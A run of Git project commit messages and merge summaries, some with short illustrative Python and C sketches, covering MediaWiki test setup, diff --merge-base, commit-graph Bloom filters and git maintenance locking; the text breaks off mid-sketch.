Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace the use of screen-scraping in the test environment
installation with simply invoking MediaWiki's command-line
installer.
The old code being deleted here relied on our own hardcoded POST
parameter names & the precise layout of MediaWiki's GUI installer at a
given version. Somewhere between [1] and now this inevitably broke.
As far as I can tell there was never a reason for this screen-scraping
hack: when [1] was introduced it hardcoded MediaWiki 1.19.0, and the CLI
installer was introduced in 1.17.0. Perhaps the authors weren't aware
of it, or this code was written for an older version.
This allows us to simply delete our own template version of
LocalSettings.php, it'll instead be provided by the CLI installer.
While we're at it let's fix a few things. These changes weren't
practical to split up (I'd need to fix code I was about to mostly
delete):
* Use MediaWiki's own defaults where possible, e.g. before we'd name
the database "wikidb.sqlite", now we'll simply use whatever name
MediaWiki prefers (currently my_wiki.sqlite) by only supplying the
directory name the SQLite file will be dropped into, not the full
path.
* Put all of our database & download assets into a new "mediawiki/"
folder. This makes it easier to reason about as the current &
template "backup" database the tests keep swapping around live
next to each other.
This'll also prevent future potential breakage as there isn't a
single SQLite database. MediaWiki also creates a job queue
database and a couple of cache databases. In practice it seems we
got away with not resetting these when we reset the main database,
but it's the sort of thing that could break in the future (reset,
main store doesn't have the article, but the cache does).
* The "delete" function now only deletes the MediaWiki installation
& database, not the downloaded .tar.gz file. This makes us
friendlier to a developer on a slow connection.
1. 5ef6ad1785 ("git-remote-mediawiki: scripts to install, delete and
clear a MediaWiki", 2012-07-06)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace the use of the "open" pragma with a three-arg open in the
places that actually care about UTF-8, while leaving those that
don't (the config parsing).
Unlike the previous "encoding" pragma change this isn't needed for
compatibility with anything. I just think it's easier to read code
that has localized effects than code that changes global settings.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The use of the encoding pragma has been a hard error since Perl
5.18 (released in 2013).
What this script really wanted to do was to decode @ARGV and write out
some files with the UTF-8 PerlIO layer. Let's just do that explicitly
instead.
This explicitly does not retain the previous UTF-8 semantics of the
script. The "encoding" pragma had all sorts of global effects (program
text being UTF-8, stdin/stdout etc.). But the only thing that was
required was decoding @ARGV and writing out UTF-8 data, which is
currently facilitated with the "open" pragma.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the dispatch table code in test-gitmw.pl to use a hash where
subroutine references are the values. This is more obvious than a hash
where the values are strings we'll use to go searching around in the
symbol table for the function.
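The same idea, sketched in Python rather than Perl: the table's values are the functions themselves, so no name has to be looked up at call time. The command and function names below are hypothetical and are not taken from test-gitmw.pl.

```python
def wiki_getpage(name):
    return "get " + name


def wiki_delete_page(name):
    return "delete " + name


# Values are function references; a misspelled function name fails as soon
# as the table is built, not when the command is eventually dispatched.
DISPATCH = {
    "get_page": wiki_getpage,
    "delete_page": wiki_delete_page,
}


def dispatch(command, *args):
    handler = DISPATCH.get(command)
    if handler is None:
        raise SystemExit("unknown command: " + command)
    return handler(*args)
```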
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change UI messages to use "$dir/" instead of "$dir.". I think this is
less confusing when referring to an absolute directory path.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Convert `[]` to `test` and break if-then into separate lines, both of
which bring the style in line with Git's coding guidelines.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change code that used an ad-hoc "diff -b" invocation to use our
test_cmp helper instead. I'm also changing the order of arguments to
be the standard "test_cmp <expected> <actual>".
Using test_cmp has different semantics since the "-b" option to diff
causes it to ignore whitespace, but in these cases the use of "-b" was
just meaningless boilerplate. The desired semantics here are to
compare "git log" lines with known-good data, so we don't want to
ignore whitespace.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In more recent versions of MediaWiki a longer password is a requirement,
e.g. in the current stable version, 1.32.2.
The web installer now refuses our old 9 character password, the
command-line one (will be used in a subsequent change) will accept it,
but trying to use it in the web UI will emit an error asking the user
to reset the password. Let's use a password that'll just work and
allow us to log in as the admin user.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a hardcoded user/password for the corresponding variable
defined in contrib/mw-to-git/t/test.config.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the hardcoded PHP version 5 package names to the version-agnostic
packages. Currently Debian stable's version is 7.3, and there's a
php7.3, php7.3-cli etc. package available (but no php5-*).
The corresponding version-less package is a dependency package which
depends on whatever the current stable version is. By not hardcoding
the version these instructions won't be out of date when the next
Debian/Ubuntu release happens.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is currently no easy way to take the diff between the working tree
or index and the merge base between an arbitrary commit and HEAD. Even
diff's `...` notation doesn't allow this because it only works between
commits. However, the ability to do this would be desirable to a user
who would like to see all the changes they've made on a branch plus
uncommitted changes without taking into account changes made in the
upstream branch.
Teach diff-index and diff (with one commit) the --merge-base option
which allows a user to use the merge base of a commit and HEAD as the
"before" side.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the future, we will be adding more --merge-base tests to this test
script. To prepare for that, rename the script accordingly and update
its description. Also, add two basic --merge-base tests that don't
require any functionality to be implemented yet.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future commit, we will be using this function to implement
--merge-base functionality in various diff commands.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future commit, we will teach run_diff_index() to accept more
options via flag bits. For now, change `cached` into a flag in the
`option` bitfield. The behaviour should remain exactly the same.
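As an illustration of the pattern (in Python, not the C code being changed), a boolean parameter becomes one bit in a flag set so that later options can be added without touching every caller. The class name, the second flag and the return strings are assumptions made for this sketch.

```python
from enum import IntFlag


class DiffIndexOption(IntFlag):
    CACHED = 1 << 0      # what used to be the boolean `cached` parameter
    MERGE_BASE = 1 << 1  # hypothetical flag a later change might add


def run_diff_index(option=DiffIndexOption(0)):
    """Behave exactly as before: only the way `cached` is passed changes."""
    if option & DiffIndexOption.CACHED:
        return "compare tree with index"
    return "compare tree with working tree"
```

Callers that used to pass a true value now pass `DiffIndexOption.CACHED`, and callers that passed false pass no flags.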
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Users frequently have problems where two filenames differ only in case,
causing one of those files to show up consistently as being modified.
Let's add a FAQ entry that explains how to deal with that.
In addition, let's explain another common case where files are
consistently modified, which is when files using a smudge or clean
filter have not been run through that filter. Explain the way to fix
this as well.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A common scenario is for a user to apply a change to one branch and
cherry-pick it into another, then later revert it in the first branch.
This results in the change being present when the two branches are
merged, which is confusing to many users.
We already have documentation for how this works in `git merge`, but it
is clear from the frequency with which this is asked that it's hard to
grasp. We also don't explain to users that they are better off doing a
rebase in this case, which will do what they intended. Let's add an
entry to the FAQ telling users what's happening and advising them to use
rebase here.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In many projects, squash merges are commonly used, primarily to keep a
tidy history in the face of developers who do not use logically
independent, bisectable commits. As common as this is, this tends to
cause significant problems when squash merges are used to merge
long-running branches due to the lack of any new merge bases. Even very
experienced developers may make this mistake, so let's add a FAQ entry
explaining why this is problematic and explaining that regular merge
commits should be used to merge two long-running branches.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The refs update commands can be sent to the server side in two different
ways: GPG-signed or unsigned. We should run these two operations in the
same "Finally, tell the other end!" code block, but they are separated
by the "Clear the status for each ref" code block. This will result in
a slight performance loss, because the failed atomic push will still
perform unnecessary preparations for shallow advertise and GPG-signed
commands buffers, and the user may be bothered by the (possible) GPG
passphrase input when there is nothing to sign.
Add a new test case to t5534 to ensure GPG will not be called when the
GPG-signed atomic push fails.
Signed-off-by: Han Xin <hanxin.hx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add untracked files for the dist target directly using git archive
instead of calling tar cr to append them. This reduces the dependency
on external tools and gives the untracked files the same access times
and user information as tracked ones, integrating them seamlessly.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow users to append non-tracked files. This simplifies the generation
of source packages with a few extra files, e.g. containing version
information. They get the same access times and user information as
tracked files.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Centralize reading of symlink destinations and the contents of regular
files that are too small to be streamed. This reduces code duplication
and allows future patches to add support for adding non-tracked files to
archives. The backends are expected to stream blobs if buffer is NULL.
object_file_to_archive() is only called from archive.c and thus no
longer exported.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git-p4 unshelve uses HEAD^$n to find the parent commit, which
fails if there is an additional commit.
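As background, in Git's revision syntax `rev^n` names the n-th parent of a commit, while `rev~n` follows first parents for n generations. The toy Python sketch below (hypothetical linear history, not git-p4 code) shows why `^n` stops resolving for n greater than 1 when the commits are not merges.

```python
# Linear toy history: HEAD -> c2 -> c1 -> c0 (each commit has one parent).
PARENTS = {"c0": [], "c1": ["c0"], "c2": ["c1"], "HEAD": ["c2"]}


def nth_parent(commit, n):
    """rev^n: the n-th parent of a commit, or None if it has no such parent."""
    parents = PARENTS[commit]
    return parents[n - 1] if 1 <= n <= len(parents) else None


def nth_ancestor(commit, n):
    """rev~n: follow the first parent n times."""
    for _ in range(n):
        commit = PARENTS[commit][0]
    return commit
```

Here `nth_parent("HEAD", 2)` finds nothing because HEAD has a single parent, whereas `nth_ancestor("HEAD", 2)` walks back two commits.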
Signed-off-by: Luke Diamand <luke@diamand.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be32() instead of open-coding it. This shortens the code
a bit and makes it easier to read.
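A Python analogue of the cleanup, for illustration only (the function names are made up and this is not the C code): both functions write the same four big-endian bytes, but the second states the intent in a single call.

```python
import io
import struct


def write_be32_open_coded(out, value):
    """Open-coded: assemble the four big-endian bytes by hand."""
    out.write(bytes([
        (value >> 24) & 0xFF,
        (value >> 16) & 0xFF,
        (value >> 8) & 0xFF,
        value & 0xFF,
    ]))


def write_be32(out, value):
    """Helper-style: one call that names the byte order and width."""
    out.write(struct.pack(">I", value))


manual, helper = io.BytesIO(), io.BytesIO()
write_be32_open_coded(manual, 0x12345678)
write_be32(helper, 0x12345678)
```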
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Unlike "git config --local", "git config --worktree" did not fail
early and cleanly when started outside a git repository.
* mt/config-fail-nongit-early:
config: complain about --worktree outside of a git repo
Allow maintainers to tweak $(TAR) invocations done while making
distribution tarballs.
* jc/dist-tarball-tweak:
Makefile: allow extra tweaking of distribution tarball
"git diff/show" on a change that involves a submodule used to read
the information on commits in the submodule from a wrong repository
and gave wrong information when the commit-graph is involved.
* mf/submodule-summary-with-correct-repository:
submodule: use submodule repository when preparing summary
revision: use repository from rev_info when parsing commits
"git status --short" quoted a path with SP in it when tracked, but
not those that are untracked, ignored or unmerged. They are all
shown quoted consistently.
* jc/quote-path-cleanup:
quote: turn 'nodq' parameter into a set of flags
quote: rename misnamed sq_lookup[] to cq_lookup[]
wt-status: consistently quote paths in "status --short" output
quote_path: code clarification
quote_path: optionally allow quoting a path with SP in it
quote_path: give flags parameter to quote_path()
quote_path: rename quote_path_relative() to quote_path()
Optimization around submodule handling.
* os/collect-changed-submodules-optim:
submodule: suppress checking for file name and ref ambiguity for object ids
"git worktree add" learns that the "-d" is a synonym to "--detach"
option to create a new worktree without being on a branch.
* es/wt-add-detach:
git-worktree.txt: discuss branch-based vs. throwaway worktrees
worktree: teach `add` to recognize -d as shorthand for --detach
git-checkout.txt: document -d short option for --detach
The "add -i/-p" machinery has been written in C but it is not used
by default yet. It is made default to those who are participating
in feature.experimental experiment.
* jc/add-i-use-builtin-experimental:
add -i: use the built-in version when feature.experimental is set
A bit of API reshuffling to make sure stuff common to all backends
is not defined only in the files backend.
* hn/refs-ref-log-only-bit:
refs: move REF_LOG_ONLY to refs-internal.h
Code cleanup.
* so/log-tree-diff-cleanup:
log_tree_diff: get rid of extra check for NULL
log_tree_diff: get rid of code duplication for first_parent_only
Misc cleanups.
* rs/misc-cleanups:
pack-bitmap-write: use hashwrite_be32() in write_hash_cache()
midx: use hashwrite_u8() in write_midx_header()
fast-import: use write_pack_header()
Change filters.txt to ref-reachability-filters.txt in order to avoid
squatting on a file name that might be useful for another purpose.
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The internal reachable-filter API is a bit loose and imprecise; it
also bleeds unnecessarily into the public header. Tighten the API
by:
* renaming do_merge_filter() to reach_filter()
* separating parameters to explicitly identify what data is used
by the function instead of passing an entire ref_filter_cbdata
struct
* renaming and moving internal constants from header to source
file
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Introduce a configuration variable to specify a default value for the
recently-introduced '--max-new-filters' option of 'git commit-graph
write'.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Introduce a command-line flag to specify the maximum number of new Bloom
filters that a 'git commit-graph write' is willing to compute from
scratch.
Prior to this patch, a commit-graph write with '--changed-paths' would
compute Bloom filters for all selected commits which haven't already
been computed (i.e., by a previous commit-graph write with '--split'
such that a roll-up or replacement is performed).
This behavior can cause prohibitively-long commit-graph writes for a
variety of reasons:
* There may be lots of filters whose diffs take a long time to
generate (for example, they have close to the maximum number of
changes, diffing itself takes a long time, etc).
* Old-style commit-graphs (which encode filters with too many entries
as not having been computed at all) cause us to waste time
recomputing filters that appear to have not been computed only to
discover that they are too-large.
This can make the upper-bound of the time it takes for 'git commit-graph
write --changed-paths' to be rather unpredictable.
To make this command behave more predictably, introduce
'--max-new-filters=<n>' to allow computing at most '<n>' Bloom filters
from scratch. This lets "computing" already-known filters proceed
quickly, while bounding the number of slow tasks that Git is willing to
do.
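The bounding behavior can be sketched as follows. This is a simplified Python model with hypothetical names (write_filters(), a dict standing in for already-known filters); it is not the commit-graph code, only an illustration of "reuse what is known, compute at most <n> from scratch".

```python
def write_filters(commits, known, compute, max_new_filters):
    """Collect filters for commits, computing at most max_new_filters anew."""
    filters, computed = {}, 0
    for commit in commits:
        if commit in known:
            # "Computing" an already-known filter is just a cheap lookup.
            filters[commit] = known[commit]
        elif computed < max_new_filters:
            filters[commit] = compute(commit)  # the slow path
            computed += 1
        # Otherwise the filter stays uncomputed, to be picked up by a
        # later write.
    return filters, computed


filters, computed = write_filters(
    ["a", "b", "c", "d"],
    known={"a": "filter-a"},
    compute=lambda commit: "filter-" + commit,
    max_new_filters=2,
)
```

In this run the known filter for "a" is reused, "b" and "c" are computed, and "d" is left for a later write.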
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the subsequent commit, additional options will be added to the
commit-graph API which have nothing to do with splitting.
Rename the 'split_commit_graph_opts' structure to the more-generic
'commit_graph_opts' to encompass both. Likewise, rename the 'flags'
member to instead be 'split_flags' to clarify that it only has to do
with the behavior implied by '--split'.
Suggested-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a changed-path Bloom filter has either zero, or more than a
certain number (commonly 512) of entries, the commit-graph machinery
encodes it as "missing". More specifically, it sets the indices adjacent
in the BIDX chunk as equal to each other to indicate a "length 0"
filter; that is, that the filter occupies zero bytes on disk.
This has heretofore been fine, since the commit-graph machinery has no
need to care about these filters with too few or too many changed paths.
Both cases act like no filter has been generated at all, and so there is
no need to store them.
In a subsequent commit, however, the commit-graph machinery will learn
to only compute Bloom filters for some commits in the current
commit-graph layer. This is a change from the current implementation
which computes Bloom filters for all commits that are in the layer being
written. Critically for this patch, only computing some of the Bloom
filters means adding a third state for length 0 Bloom filters: zero
entries, too many entries, or "hasn't been computed".
It will be important for that future patch to distinguish between "not
representable" (i.e., zero or too-many changed paths), and "hasn't been
computed". In particular, we don't want to waste time recomputing
filters that have already been computed.
To that end, change how we store Bloom filters in the "computed but not
representable" category:
- Bloom filters with no entries are stored as a single byte with all
bits low (i.e., all queries to that Bloom filter will return
"definitely not")
- Bloom filters with too many entries are stored as a single byte with
all bits set high (i.e., all queries to that Bloom filter will
return "maybe").
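A small Python model of why the two one-byte encodings answer queries as described. The query function and the sample bit positions are assumptions for this sketch (real filters derive positions from path hashes); only the two byte values come from the rules above.

```python
EMPTY_FILTER = bytes([0x00])      # computed, no changed paths
TOO_LARGE_FILTER = bytes([0xFF])  # computed, too many changed paths


def maybe_contains(filter_bytes, bit_positions):
    """Bloom query: "maybe" only if every probed bit is set."""
    nbits = len(filter_bytes) * 8
    if nbits == 0:
        raise ValueError("length-0 filter: nothing has been computed")
    for position in bit_positions:
        bit = position % nbits
        if not filter_bytes[bit // 8] & (1 << (bit % 8)):
            return False  # definitely not
    return True  # maybe


probe = [3, 17, 99]  # arbitrary sample positions
```

Whatever positions are probed, the all-zero byte always answers "definitely not" and the all-ones byte always answers "maybe".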
These rules are sufficient to not incur a behavior change by changing
the on-disk representation of these two classes. Likewise, no
specification changes are necessary for the commit-graph format, either:
- Filters that were previously empty will be recomputed and stored
according to the new rules, and
- old clients reading filters generated by new clients will interpret
the filters correctly and be none the wiser to how they were
generated.
Clients will invoke the Bloom machinery in more cases than before, but
this could be avoided by returning a NULL filter when all bits are set
high; that is left for a future patch.
Note that this does increase the size of on-disk commit-graphs, but far
less than other proposals. In particular, this is generally more
efficient than storing a bitmap for which commits haven't computed their
Bloom filters. Storing a bitmap incurs a penalty of one bit per commit,
whereas storing explicit filters as above incurs a penalty of one byte
per too-large or empty commit.
In practice, these boundary commits likely occupy a small proportion of
the overall number of commits, and so the size penalty is likely smaller
than storing a bitmap for all commits.
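The trade-off is simple arithmetic, sketched here in Python for a hypothetical repository (the commit count and the 1% boundary fraction are made-up inputs, not measurements): a bitmap costs one bit for every commit, the explicit encoding one byte for every boundary commit.

```python
def bitmap_bytes(num_commits):
    """One bit per commit, rounded up to whole bytes."""
    return (num_commits + 7) // 8


def explicit_filter_bytes(num_commits, boundary_fraction):
    """One byte per commit with zero or too many changed paths."""
    return round(num_commits * boundary_fraction)


commits = 1_000_000  # hypothetical repository size
bitmap_cost = bitmap_bytes(commits)
explicit_cost = explicit_filter_bytes(commits, 0.01)
```

By the same arithmetic, the explicit encoding is the smaller of the two whenever fewer than one commit in eight is a boundary commit.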
See, for example, these relative proportions of such boundary commits
(collected by SZEDER Gábor):
                 |     Percentage of     |   commit-graph    |           |
                 |   commits modifying   |     file size     |           |
                 ├────────┬──────────────┼─────────┬─────────┤   pct.    |
                 | 0 path | >= 512 paths | before  |  after  |  change   |
┌────────────────┼────────┼──────────────┼─────────┼─────────┼───────────┤
| android-base   | 13.20% |        0.13% | 37.468M | 37.534M | +0.1741 % |
| cmssw          |  0.15% |        0.23% | 17.118M | 17.119M | +0.0091 % |
| cpython        |  3.07% |        0.01% |  7.967M |  7.971M | +0.0423 % |
| elasticsearch  |  0.70% |        1.00% |  8.833M |  8.835M | +0.0128 % |
| gcc            |  0.00% |        0.08% | 16.073M | 16.074M | +0.0030 % |
| gecko-dev      |  0.14% |        0.64% | 59.868M | 59.874M | +0.0105 % |
| git            |  0.11% |        0.02% |  3.895M |  3.895M | +0.0020 % |
| glibc          |  0.02% |        0.10% |  3.555M |  3.555M | +0.0021 % |
| go             |  0.00% |        0.07% |  3.186M |  3.186M | +0.0018 % |
| homebrew-cask  |  0.40% |        0.02% |  7.035M |  7.035M | +0.0065 % |
| homebrew-core  |  0.01% |        0.01% | 11.611M | 11.611M | +0.0002 % |
| jdk            |  0.26% |        5.64% |  5.537M |  5.540M | +0.0590 % |
| linux          |  0.01% |        0.51% | 63.735M | 63.740M | +0.0073 % |
| llvm-project   |  0.12% |        0.03% | 25.515M | 25.516M | +0.0050 % |
| rails          |  0.10% |        0.10% |  6.252M |  6.252M | +0.0027 % |
| rust           |  0.07% |        0.17% |  9.364M |  9.364M | +0.0033 % |
| tensorflow     |  0.09% |        1.02% |  7.009M |  7.010M | +0.0158 % |
| webkit         |  0.05% |        0.31% | 17.405M | 17.406M | +0.0047 % |
(where the above increase is determined by computing a non-split
commit-graph before and after this patch).
Given that these projects are all "large" by commit count, the storage
cost by writing these filters explicitly is negligible. In the most
extreme example, android-base (which has 494,848 commits at the time of
writing) would have its commit-graph increase by a modest 68.4 KB.
Finally, a test to exercise filters which contain too many changed path
entries will be introduced in a subsequent patch.
Suggested-by: SZEDER Gábor <szeder.dev@gmail.com>
Suggested-by: Jakub Narębski <jnareb@gmail.com>
Helped-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The completion for format-patch currently suggests --base=, --interdiff=
and --range-diff= as options. However, with these `=` forms of the
options, there is no space and we'd enter the `--*` case which means we
don't call the __git_complete_revlist() at the end.
Teach _git_format_patch() to complete refs in the case of --base=,
--interdiff= and --range-diff=.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Suppress the message 'origin/HEAD set to master' in case of an error.
$ git remote set-head origin -a
error: Not a valid ref: refs/remotes/origin/master
origin/HEAD set to master
Signed-off-by: Christian Schlack <christian@backhub.co>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The approximate_object_count() function tries to compute the count only
once per process. But ever since it was introduced in 8e3f52d778
(find_unique_abbrev: move logic out of get_short_sha1(), 2016-10-03), we
failed to actually set the "valid" flag, meaning we'd compute it fresh
on every call.
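The shape of the bug, modelled in Python (the class and the `computations` counter are invented for this sketch; the real function is C and works on the packed_git list): a compute-once cache only works if the "valid" flag is actually set after the first computation.

```python
class ObjectCounter:
    def __init__(self, pack_sizes):
        self.pack_sizes = pack_sizes  # object count of each pack
        self.count = 0
        self.valid = False
        self.computations = 0         # instrumentation for this sketch only

    def approximate_object_count(self):
        if not self.valid:
            self.computations += 1
            self.count = sum(self.pack_sizes)
            # Without the next line the sum is recomputed on every call.
            self.valid = True
        return self.count


counter = ObjectCounter([10, 20])
results = [counter.approximate_object_count() for _ in range(3)]
```

After three calls the count has been computed exactly once.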
This turns out not to be _too_ bad, because we're only iterating through
the packed_git list, and not making any system calls. But since it may
get called for every abbreviated hash we output, even this can add up if
you have many packs.
Here are before-and-after timings for a new perf test which just asks
rev-list to abbreviate each commit hash (the test repo is linux.git,
with commit-graphs):
Test                           origin             HEAD
----------------------------------------------------------------------------
5303.3: rev-list (1)           28.91(28.46+0.44)  29.03(28.65+0.38) +0.4%
5303.4: abbrev-commit (1)      1.18(1.06+0.11)    1.17(1.02+0.14) -0.8%
5303.7: rev-list (50)          28.95(28.56+0.38)  29.50(29.17+0.32) +1.9%
5303.8: abbrev-commit (50)     3.67(3.56+0.10)    3.57(3.42+0.15) -2.7%
5303.11: rev-list (1000)       30.34(29.89+0.43)  30.82(30.35+0.46) +1.6%
5303.12: abbrev-commit (1000)  86.82(86.52+0.29)  77.82(77.59+0.22) -10.4%
5303.15: load 10,000 packs     0.08(0.02+0.05)    0.08(0.02+0.06) +0.0%
It doesn't help at all when we have 1 pack (5303.4), but we get a 10%
speedup when there are 1000 packs (5303.12). That's a modest speedup for
a case that's already slow and we'd hope to avoid in general (note how
slow it is even after, because we have to look in each of those packs
for abbreviations). But it's a one-line change that clearly matches the
original intent, so it seems worth doing.
The included perf test may also be useful for keeping an eye on any
regressions in the overall abbreviation code.
Reported-by: Rasmus Villemoes <rv@rasmusvillemoes.dk>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of writing a new commit-graph in every 'git maintenance run
--auto' process (when maintenance.commit-graph.enabled is configured to
be true), only write when there are "enough" commits not in a
commit-graph file.
This count is controlled by the maintenance.commit-graph.auto config
option.
To compute the count, use a depth-first search starting at each ref, and
leaving markers using the SEEN flag. If this count reaches the limit,
then terminate early and start the task. Otherwise, this operation will
peel every ref and parse the commit it points to. If these are all in
the commit-graph, then this is typically a very fast operation. Users
with many refs might feel a slow-down, and hence could consider updating
their limit to be very small. A negative value will force the step to
run every time.
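A rough Python model of the counting walk described above. The function name, the dict-based history and the set standing in for "is in the commit-graph" are assumptions of this sketch, as is the choice to stop walking at a commit that is already in the graph; a limit of zero is not modelled.

```python
def should_write_commit_graph(ref_tips, parents, in_graph, limit):
    """Return True once `limit` reachable commits are found outside the graph."""
    if limit < 0:
        return True  # a negative value forces the task to run every time
    seen = set()     # plays the role of the SEEN flag
    count = 0
    for tip in ref_tips:
        stack = [tip]
        while stack:
            commit = stack.pop()
            # Assumption: history below a commit already in the graph is
            # covered, so the walk does not descend past it.
            if commit in seen or commit in in_graph:
                continue
            seen.add(commit)
            count += 1
            if count >= limit:
                return True  # terminate early and start the task
            stack.extend(parents[commit])
    return False


history = {"a": [], "b": ["a"], "c": ["b"], "d": ["c"]}
```

With "a" and "b" already in the graph and a single ref at "d", two commits are missing, so a limit of 2 triggers a write and a limit of 3 does not.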
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'git maintenance run' command has an '--auto' option. This is used
by other Git commands such as 'git commit' or 'git fetch' to check if
maintenance should be run after adding data to the repository.
Previously, this --auto option was only used to add the argument to the
'git gc' command as part of the 'gc' task. We will be expanding the
other tasks to perform a check to see if they should do work as part of
the --auto flag, when they are enabled by config.
First, update the 'gc' task to perform the auto check inside the
maintenance process. This prevents running an extra 'git gc --auto'
command when not needed. It also shows a model for other tasks.
Second, use the 'auto_condition' function pointer as a signal for
whether we enable the maintenance task under '--auto'. For instance, we
do not want to enable the 'fetch' task in '--auto' mode, so that
function pointer will remain NULL.
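A minimal sketch of that signal, assuming a simplified task struct
('struct toy_task', 'task_should_run' and the two condition stubs are
hypothetical names, not the ones in builtin/gc.c):

```c
#include <stddef.h>

typedef int (*auto_condition_fn)(void);

struct toy_task {
	const char *name;
	int enabled;
	auto_condition_fn auto_condition;	/* NULL: never run under --auto */
};

/* Hypothetical condition stubs; a real one would inspect the repository. */
static int toy_always(void) { return 1; }
static int toy_never(void) { return 0; }

/*
 * Decide whether a task runs. Without --auto, being enabled is enough.
 * With --auto, the task also needs a non-NULL auto_condition that
 * reports that there is work to do.
 */
int task_should_run(const struct toy_task *t, int auto_mode)
{
	if (!t->enabled)
		return 0;
	if (!auto_mode)
		return 1;
	return t->auto_condition != NULL && t->auto_condition();
}
```

With this shape, leaving the pointer NULL for a task such as 'fetch'
is all it takes to keep it out of '--auto' runs.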
Now that we are not automatically calling 'git gc', a test in
t5514-fetch-multiple.sh must be changed to watch for 'git maintenance'
instead.
We continue to pass the '--auto' option to the 'git gc' command when
necessary, because the gc.autoDetach config option changes behavior.
Likely, we will want to absorb the daemonizing behavior implied by
gc.autoDetach as a maintenance.autoDetach config option.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, a normal run of "git maintenance run" will only run the 'gc'
task, as it is the only one enabled. This is mostly for backwards-
compatible reasons since "git maintenance run --auto" commands replaced
previous "git gc --auto" commands after some Git processes. Users could
manually run specific maintenance tasks by calling "git maintenance run
--task=<task>" directly.
Allow users to customize which steps are run automatically using config.
The 'maintenance.<task>.enabled' option then can turn on these other
tasks (or turn off the 'gc' task).
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Performing maintenance on a Git repository involves writing data to the
.git directory, which is not safe to do with multiple writers attempting
the same operation. Ensure that only one 'git maintenance' process is
running at a time by holding a file-based lock. Simply the presence of
the .git/maintenance.lock file will prevent future maintenance. This
lock is never committed, since it does not represent meaningful data.
Instead, it is only a placeholder.
If the lock file already exists, then no maintenance tasks are
attempted. This will become very important later when we implement the
'prefetch' task, as this is our stop-gap from creating a recursive process
loop between 'git fetch' and 'git maintenance run --auto'.
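The idea of a presence-only lock can be sketched with plain POSIX
calls. This is not Git's lockfile API; 'take_lock' and 'release_lock'
are hypothetical helpers, and the path is whatever the caller passes in.

```c
#include <fcntl.h>
#include <unistd.h>

/*
 * Try to take the lock by creating 'path' exclusively. O_EXCL makes
 * the call fail if the file already exists, so only one process can
 * succeed. Returns 0 on success, -1 otherwise.
 */
int take_lock(const char *path)
{
	int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0666);

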